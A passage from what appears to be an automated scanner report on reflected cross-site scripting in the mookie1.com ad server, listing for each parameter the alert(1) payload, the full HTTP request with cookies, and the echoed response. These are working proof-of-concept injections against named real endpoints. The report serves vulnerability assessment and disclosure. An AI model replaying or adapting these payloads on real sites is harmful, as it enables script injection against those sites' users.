Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1486659847/x23ce5e6"><script>alert(1)</script>7b9a5b33a77/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.322. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1169827066@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734aa"-alert(1)-"2615324c30b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728734aa"-alert(1)-"2615324c30b HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728734aa"-alert(1)-"2615324c30b";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.323. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1169827066@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d43f2"-alert(1)-"d90c9fa87b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&d43f2"-alert(1)-"d90c9fa87b4=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251852

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&d43f2"-alert(1)-"d90c9fa87b4=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.324. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11711169344@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b9a"><script>alert(1)</script>00e60963e9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc2b9a"><script>alert(1)</script>00e60963e9e/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc2b9a"><script>alert(1)</script>00e60963e9e/2010DM/442642699/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.325. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11711169344@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1236"><script>alert(1)</script>bb4a83ff16b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMc1236"><script>alert(1)</script>bb4a83ff16b/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMc1236"><script>alert(1)</script>bb4a83ff16b/301824280/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.326. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11711169344@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63148"><script>alert(1)</script>79a363b6f58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11711169344@x2363148"><script>alert(1)</script>79a363b6f58?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1217507998/x2363148"><script>alert(1)</script>79a363b6f58/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.327. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11711169344@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_TF_CT_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a32"-alert(1)-"68d1cedd6ec was submitted in the USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_72830a32"-alert(1)-"68d1cedd6ec HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2481
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_72830a32"-alert(1)-"68d1cedd6ec";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.328. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11711169344@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cea2"-alert(1)-"68fd8c2db03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728&5cea2"-alert(1)-"68fd8c2db03=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2484
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_TF_CT_728&5cea2"-alert(1)-"68fd8c2db03=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.329. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/117382567@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425ff"><script>alert(1)</script>83713a5700b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM425ff"><script>alert(1)</script>83713a5700b/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM425ff"><script>alert(1)</script>83713a5700b/2010DM/1891759279/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.330. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/117382567@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fbb4"><script>alert(1)</script>e91f36c3ebf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM4fbb4"><script>alert(1)</script>e91f36c3ebf/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM4fbb4"><script>alert(1)</script>e91f36c3ebf/1040297436/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.331. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/117382567@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33292"><script>alert(1)</script>790b6dea070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/117382567@x2333292"><script>alert(1)</script>790b6dea070?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2089608781/x2333292"><script>alert(1)</script>790b6dea070/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.332. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/117382567@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8204f"-alert(1)-"98ce25bd14a was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/117382567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3008204f"-alert(1)-"98ce25bd14a HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260799

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
